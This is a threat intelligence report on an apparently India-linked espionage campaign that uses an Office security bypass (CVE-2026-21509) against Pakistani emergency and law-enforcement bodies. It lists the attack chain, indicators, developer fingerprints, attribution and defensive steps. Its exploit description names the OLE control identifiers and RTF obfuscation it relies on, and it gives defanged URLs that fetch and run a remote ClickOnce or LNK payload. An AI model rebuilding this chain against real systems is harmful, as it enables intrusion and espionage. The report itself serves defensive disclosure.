BreakglassIntelligence
Back to reports
criticalAPT

CVE-2026-21509 South Asian Espionage Campaign (WarMachine/MALDEV01) — Breakglass Intelligence Report

InvestigatedApril 3, 2026PublishedApril 3, 2026
Threat Actors:APT28APT-04ProfileAssessment
agendadoccverataptphishingcloudflaretorlnk

TLP: WHITE Date: 2026-04-03 Analyst: GHOST (Breakglass Intelligence) Classification: APT / State-Sponsored Espionage Status: COMPLETE

Executive Summary

An India-linked threat actor operating from machine MALDEV01 under username WarMachine is exploiting CVE-2026-21509 (Microsoft Office security feature bypass, CVSS 7.8) to target Pakistani government entities. The primary target is the Sindh Integrated Emergency & Health Services (SIEHS), with production payloads hosted on a compromised Punjab Safe Cities Authority (PSCA) government server. The attack chain weaponizes RTF and OLE compound documents with embedded Shell.Explorer.1 OLE objects that fetch malicious LNK files via WebDAV, bypassing Microsoft Office OLE security mitigations.

Developer artifacts reveal English-India locale (0x4009/0x4C09), WPS Office authoring environment, and a dedicated malware development workstation -- consistent with India-linked APT groups (SideWinder, Confucius, or Patchwork/Dropping Elephant). Test samples uploaded to MalwareBazaar contain an internal WebDAV server IP (192.168.171.236) with a "tets.LnK" typo, revealing hasty OPSEC.

A separate cluster of CVE-2026-21509 exploit documents (design.docx) shows Chinese-language metadata (creator "qb.li", last modified by Chinese characters, KSO locale 2052), suggesting either a shared exploit builder tool or independent Chinese-speaking adoption of the technique.

This campaign is distinct from APT28/Operation Neusploit targeting Eastern Europe, representing the first documented South Asian state-sponsored use of CVE-2026-21509.

Key Findings

  • CVE-2026-21509 exploit documents targeting Pakistani government (SIEHS emergency services, PSCA law enforcement)
  • Developer machine MALDEV01 ("Malware Development 01") and username WarMachine embedded in OLE metadata
  • English-India locale (0x4009 in OLE, deflang19465 in RTF) across all samples in the India cluster
  • WPS Office 12.2.0.23196 used as authoring tool (common in South Asian APT toolchains)
  • Production payload: ClickOnce .application hosted on compromised sbis.psca.gop.pk (Government of Punjab, Pakistan)
  • Test payload: WebDAV LNK fetch from 192.168.171.236 (internal dev network) with "tets" typo
  • Second cluster (design.docx): Chinese-language metadata, WebBrowser ActiveX CLSID variant, WPS Cloud userId 704171050
  • Shared WPS UUID (F1E327BC-269C-435d-A152-05C5408002CA) across both clusters -- may indicate shared tool or pirated WPS install

What Was Found vs. What Was Known

AspectPrior ReportingOur Findings
CVE-2026-21509 UsersAPT28 (Russia) onlyIndia-linked APT + possibly Chinese-speaking actor
Target GeographyUkraine, Czech Republic, Poland, RomaniaPakistan (SIEHS, PSCA government entities)
AttributionAPT28/Fancy BearWarMachine/MALDEV01 (India-linked, MEDIUM-HIGH confidence)
Developer ArtifactsNone for South Asian useMALDEV01, WarMachine, MALDE, WPS Office build, India locale
Compromised Infrafreefoodaid.com, wellnesscaremed.comsbis.psca.gop.pk (Pakistan gov)
Test InfrastructureNone reported192.168.171.236 internal WebDAV + "tets" typo
Chinese OperatorNot reporteddesign.docx with qb.li / userId 704171050

Attack Chain

Spear-phishing email (themed around SIEHS / emergency services)
    |
    v
Weaponized Document (3 formats observed)
    |-- OLE Compound (.doc): Shell.Explorer.1 CLSID embedded directly
    |-- RTF (.doc): objocx/objemb with hex-encoded OLE containing Shell.Explorer.1
    |-- DOCX (.docx): ActiveX WebBrowser control {8856F961-340A-11D0-A96B-00C04FD705A2}
    |
    v
CVE-2026-21509 bypass -- OLE object instantiation despite mitigations
    |
    v
Navigate() / WebBrowser call to fetch remote resource
    |-- Production: hxxps://sbis.psca.gop.pk/css/PDF-READER/PDF%20Viewer.application
    |-- Test/Dev:   file://192.168.171.236@ssl/te/tets.LnK?init=1
    |
    v
LNK / ClickOnce application auto-executed
    |
    v
Payload deployment (not recovered -- PSCA server offline)

Infrastructure Analysis

Compromised Government Infrastructure

AssetOrganizationIPStatus
sbis.psca.gop.pkPunjab Safe Cities Authority, Govt of Punjab, Pakistan103.119.125.125DOWN
DomainRegistrarCreatedNSStatus
wildishadventure.comNamecheap2025-08-08odin/zariyah.ns.cloudflare.comDOWN (521)

Developer Test Infrastructure

IPPurposeEvidence
192.168.171.236Internal WebDAV server for exploit testingEmbedded in cori.doc and c9.doc

Malware Analysis

Sample Cluster 1: India-Linked (WarMachine/MALDEV01)

Hash (SHA256)FilenameTypeSizeFirst Seen
8e53683133e7e1ddd1d8728b6ba8b9b80ec40f6772422c8adc8002bafe553f7bSIEHS Document.docOLE/DOC329,2162026-03-11
520270adf2f2f69021713dfaf5c961d88ba8b06a54d85c68b73bc590ef0ef206cori.docRTF16,8162026-03-27
b68e729104d051eaf3d118f9fd9c3fde81255f2b14f349a9ce421423407e5a77c9.docRTF16,8892026-04-01

Sample Cluster 2: Chinese-Language Operator

Hash (SHA256)FilenameTypeSizeFirst Seen
0ed6dba3092b7e546c0ee9c6fa7ed1cf9f4c20ef28e6d96f9c7e2a19c20b6a6ddesign.docxDOCX31,5022026-03-31

Developer Fingerprints (Cluster 1 - WarMachine)

ArtifactValue
Machine NameMALDEV01
UsernameWarMachine / WarMac
AuthorMALDE
ApplicationWPS Office 12.2.0.23196
WPS UUIDF1E327BC-269C-435d-A152-05C5408002CA
Locale (OLE)16393 / 0x4009 (English-India)
Locale (RTF)19465 / 0x4C09 (English-India)
Created2026-02-12 06:17:00 UTC
Last Modified2026-02-18 12:16:56 UTC

Developer Fingerprints (Cluster 2 - Chinese Operator)

ArtifactValue
Creatorqb.li
Last Modified By遂愿 (Chinese: "as one wishes")
KSO Locale2052 (Chinese Simplified)
WPS Cloud userId704171050
WPS Cloud hdid4118fa5d982d0271c78892158f470f4c
ApplicationWPS Office 12.1.0.24657
Template Created2022-08-31

CVE-2026-21509 Exploit Mechanism

  • Shell.Explorer.1 CLSID: {EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B}
  • WebBrowser CLSID: {8856F961-340A-11D0-A96B-00C04FD705A2}
  • RTF obfuscation: objocx/objemb with interleaved comment groups
  • DOCX variant: Standard OOXML ActiveX embedding with persistStorage

Threat Actor Profile

Attribution Assessment

  • Confidence: MEDIUM-HIGH (India-linked APT)
  • Country: India (HIGH confidence)
  • Evidence: English-India locale, WPS Office, MALDEV01 machine name, Pakistan gov targeting, PSCA compromise, WebDAV+LNK chain matching SideWinder/Confucius TTPs
  • Possible Groups: SideWinder (T-APT-04), Confucius (APT-Q-40), Patchwork/Dropping Elephant
  • Motivation: Espionage (intelligence on Pakistani emergency services / law enforcement)

OPSEC Failures

  1. MALDEV01 machine name in metadata
  2. WarMachine username not sanitized
  3. MALDE author field not cleared
  4. English-India locale not scrubbed
  5. Internal test IP (192.168.171.236) in released samples
  6. WPS Office build fingerprint with unique UUID
  7. "tets" typo in test LNK path
  8. WPS Cloud credentials in Cluster 2 (userId 704171050)
  9. RTF comment "fdjgbdjfbgjkdbfg" fingerprints the builder

Victim Analysis

OrganizationSectorCountryEvidenceConfidence
SIEHSEmergency Services / GovernmentPakistanFilename "SIEHS Document.doc"HIGH
PSCALaw Enforcement / GovernmentPakistanCompromised for payload hostingMEDIUM

MITRE ATT&CK Mapping

TacticTechniqueID
Initial AccessSpearphishing AttachmentT1566.001
ExecutionExploitation for Client ExecutionT1203
ExecutionUser Execution: Malicious FileT1204.002
Defense EvasionObfuscated FilesT1027
Defense EvasionExploitation for Defense EvasionT1211
C2Ingress Tool TransferT1105
Resource DevCompromise InfrastructureT1584.004
Resource DevDevelop Capabilities: MalwareT1587.001

IOC Summary

Network Indicators

hxxps://sbis[.]psca[.]gop[.]pk/css/PDF-READER/PDF%20Viewer.application
file://192[.]168[.]171[.]236@ssl/te/tets.LnK?init=1
wildishadventure[.]com
103[.]119[.]125[.]125

File Indicators

8e53683133e7e1ddd1d8728b6ba8b9b80ec40f6772422c8adc8002bafe553f7b  SIEHS Document.doc
520270adf2f2f69021713dfaf5c961d88ba8b06a54d85c68b73bc590ef0ef206  cori.doc
b68e729104d051eaf3d118f9fd9c3fde81255f2b14f349a9ce421423407e5a77  c9.doc
0ed6dba3092b7e546c0ee9c6fa7ed1cf9f4c20ef28e6d96f9c7e2a19c20b6a6d  design.docx

Behavioral Indicators

CLSID: {EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B} (Shell.Explorer.1)
CLSID: {8856F961-340A-11D0-A96B-00C04FD705A2} (WebBrowser)
deflang19465 (English-India RTF locale)
OLE Author: MALDE
OLE Machine: MALDEV01
OLE User: WarMachine
WPS UUID: F1E327BC-269C-435d-A152-05C5408002CA
RTF comment: fdjgbdjfbgjkdbfg

YARA Rules

See yara_rules/cve_2026_21509_south_asia.yar (4 rules)

Suricata Rules

See suricata_rules.rules (SIDs 9000100-9000103)

Immediate (24-48 hours)

  • Block sbis.psca.gop.pk/css/PDF-READER/ at web proxy
  • Deploy YARA rules for Shell.Explorer.1/WebBrowser CLSIDs with India locale markers
  • Alert on WebDAV connections from Office processes to external IPs
  • Notify Pakistan CERT about compromised PSCA infrastructure
  • Notify SIEHS about active targeting

Short-term (1-2 weeks)

  • Patch Office for CVE-2026-21509 (KB5032990+)
  • Hunt for ClickOnce .application files via Office
  • Monitor MalwareBazaar for new CVE-2026-21509 samples from reporter smica83

Medium-term (1-3 months)

  • Block Shell.Explorer.1 and WebBrowser CLSIDs via Office kill-bit
  • Monitor wildishadventure.com for reactivation
  • Track WPS Cloud userId 704171050

References

Share